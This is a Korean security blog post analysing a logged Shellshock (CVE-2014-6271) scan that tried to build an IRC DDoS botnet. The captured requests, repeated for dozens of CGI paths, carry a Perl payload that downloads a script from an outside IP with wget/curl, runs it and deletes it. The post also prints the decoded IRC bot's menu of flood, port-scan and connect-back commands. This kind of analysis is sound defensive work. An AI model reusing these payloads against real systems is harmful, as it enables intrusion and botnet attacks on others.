홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 오늘의 웹서버 취약점 스캔 로그: Bash Shellshock 기반 ircbot bonet 구축 시도2014년에 발표된 이후로 여전히 Bash Shellshock 취약점은 주요 자동화공격 대상에 포함되어 있다. 오늘 관찰한 쉘쇼크 취약점 스캔 로그는 ircbot 기반의 DDoS 봇넷 구축을 하려는 시도로 보인다. 46.105.123.22 - - [21/Jan/2017:19:04:41 +0900] "GET HTTP/1.1 HTTP/1.1" 400 455 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:45 +0900] "GET /main.cgi HTTP/1.1" 404 433 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:45 +0900] "GET /info.cgi HTTP/1.1" 404 433 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:46 +0900] "GET /index.cgi HTTP/1.1" 404 434 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:48 +0900] "GET /admin.cgi HTTP/1.1" 404 434 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:48 +0900] "GET /administrator.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:49 +0900] "GET /cgi-bin/report.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:49 +0900] "GET /cgi-bin/webmap.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:51 +0900] "GET /cgi-bin/whois.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:51 +0900] "GET /cgi-sys/helpdesk.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:53 +0900] "GET /cgi-bin/register.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:54 +0900] "GET /cgi-bin/download.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:55 +0900] "GET /cgi-bin/shop.cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:56 +0900] "GET /cgi-sys/signup.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:56 +0900] "GET /cgi-bin/profile.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:57 +0900] "GET /cgi-bin/about_us.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:58 +0900] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:04:58 +0900] "GET /cgi-bin/calendar.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:00 +0900] "GET /cgi-bin/download.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:00 +0900] "GET /cgi-bin/light_board.cgi HTTP/1.1" 404 448 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:01 +0900] "GET /cgi-bin/main.cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:01 +0900] "GET /cgi-bin/search.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:02 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:04 +0900] "GET /cgi-bin/file_up.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:04 +0900] "GET /cgi-bin/concept.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:05 +0900] "GET /cgi-bin/query.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:05 +0900] "GET /cgi-bin/counter.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:06 +0900] "GET /cgi-bin/kontakt.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:08 +0900] "GET /cgi-bin/backup.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:08 +0900] "GET /cgi-bin/firewall.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:09 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:09 +0900] "GET /cgi-bin/index2.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:10 +0900] "GET /cgi-bin/reboot.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:11 +0900] "GET /cgi-bin/printenv HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:11 +0900] "GET /cgi-bin/test-cgi HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:12 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.1" 404 445 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:16 +0900] "GET /cgi-bin/supply.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:17 +0900] "GET /cgi-bin/test.sh HTTP/1.1" 404 440 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:18 +0900] "GET /cgi-bin/upload.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:23 +0900] "GET /cgi-bin/status.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:24 +0900] "GET /cgi-bin/uptime.cgi HTTP/1.1" 404 443 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:28 +0900] "GET /cgi-bin/contact.cgi HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:35 +0900] "GET /cgi-bin/hello.cgi HTTP/1.1" 404 442 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:36 +0900] "GET /cgi-bin/php HTTP/1.1" 404 436 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:37 +0900] "GET /cgi-bin/php4 HTTP/1.1" 404 437 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:37 +0900] "GET /cgi-bin/php5 HTTP/1.1" 404 437 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:38 +0900] "GET /cgi-bin/php5-cli HTTP/1.1" 404 441 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:39 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 451 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:39 +0900] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 450 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:43 +0900] "GET /phppath/cgi_wrapper HTTP/1.1" 404 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'" 46.105.123.22 - - [21/Jan/2017:19:05:43 +0900] "GET /phppath/php HTTP/1.1" 404 436 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");'"
공격자 IP주소는
위의 접속로그들은 2014년에 처음 발견된
Bash Shellshock 취약점 (CVE-2014-6271)을 공략하고 있다.
User-Agent 문자열에 공격자는 PERL 해석기를 통해서 명령어 실행을 시도하고 있다. /usr/bin/perl -e 'PERL-코드'
표적 시스템이 Bash Shellshock 취약점을 가지고 있고,
첫번째 Perl 코드는 print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";
이다.
두번째 Perl 코드는 system(\"wget http://192.99.1.177/dxd2.txt -O /tmp/dxd2.txt;curl -O /tmp/dxd2.txt http://192.99.1.177/dxd2.txt;perl /tmp/dxd2.txt;rm -rf /tmp/dxd2.*\");
악성코드 분석
바이러스토탈의
원본 파일과 디코딩한 파일은
#!/usr/bin/perl #################################################################################################################### #################################################################################################################### ## perlBot v1.02012 By unknown @unknown ## [ Help ] #################################### ## Stealth MultiFunctional IrcBot Writen in Perl ##################################################### ## Teste on every system with PERL instlled ## !x @system ## ## ## !x @version ## ## This is a free program used on your own risk. ## !x @channel ## ## Created for educational purpose only. ## !x @flood ## ## I'm not responsible for the illegal use of this program. ## !x @utils ## #################################################################################################################### ## [ Channel ] #################### [ Flood ] ################################## [ Utils ] ######################### #################################################################################################################### ## !x !join <#channel> ## !x @udp1 <ip> <port> <time> ## !su @conback &l;tip> <port> ## ## !x !part <#channel> ## !x @udp2 <ip> <packet size> <time> ## !x @downlod <url+path> <file> ## ## !x !xejoin <#channel> ## !x @udp3 <ip> <port> <time> ## !x @portscan <ip> ## ## !x !op <channel> <nick> ## !x @tcp <ip> <port> <packet size> <time> ## !x @mail <subject> <sender> ## ## !x !deop <channel> <nick> ## !x @http <site> <time> ## <recipient> <message> ## ## !x !voice <channel> <nick> ## ## !x pwd;uname -a;id <for example> ## ## !x !devoice <channel> <nick> ## !x @ctcpflood <nick> ## !x @port <ip> <port> ## ## !x !nick <newnick> ## !x @msgflood <nick> ## !x @dns <ip/host> ## ## !x !msg <nick> ## !x @noticeflood <nick> ## ## ## !x !quit ## ## ## ## !x !xaw ## ## ## ## !x !die ## ## ## #################################################################################################################### ####################################################################################################################
IRC 채널을 장악하기 위한 공격법이었던 CTCP Flood( [처음 작성한 날: 2017.01.22] [마지막으로 고친 날: 2017.01.22] < 이전 글 : 오늘의 웹서버 공격 로그: Apache ProxyAbuse 탐지 시도 (2017.01.22) > 다음 글 : 오늘의 웹서버 공격 로그: phpMyAdmin 취약점 자동탐색 도구 - ZmEu Scanner (2017.01.21) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |